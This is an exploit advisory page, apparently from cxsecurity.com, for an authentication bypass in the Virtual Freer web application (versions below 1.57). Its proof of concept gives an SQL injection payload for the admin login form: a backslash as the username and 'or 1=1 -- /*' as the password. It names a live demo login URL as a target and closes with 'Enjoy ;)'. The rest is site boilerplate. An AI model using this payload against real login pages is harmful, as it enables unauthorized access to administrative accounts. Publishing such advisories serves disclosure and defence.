Virtual Freer Authentication Bypass

2015.09.07
Credit: Mohammad Reza Espargham
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : Virtual Freer < 1.57 - Authentication Bypass # Tested : CentOS / php # Vendor Homepage: http://freer.ir # # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # PoC: # # 1 . start # 2 . Start Browse / Go to http://site.com/back/login.php # 3 . Enter Username : \ # 4 . Enter Password : or 1=1 -- /* # 5 . Enjoy ;) # 5 . Finished # # # Demo Target : http://freer.ir/virtual/demo/back/login.php # -- Mohammad Reza Espargham www.reza.es


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top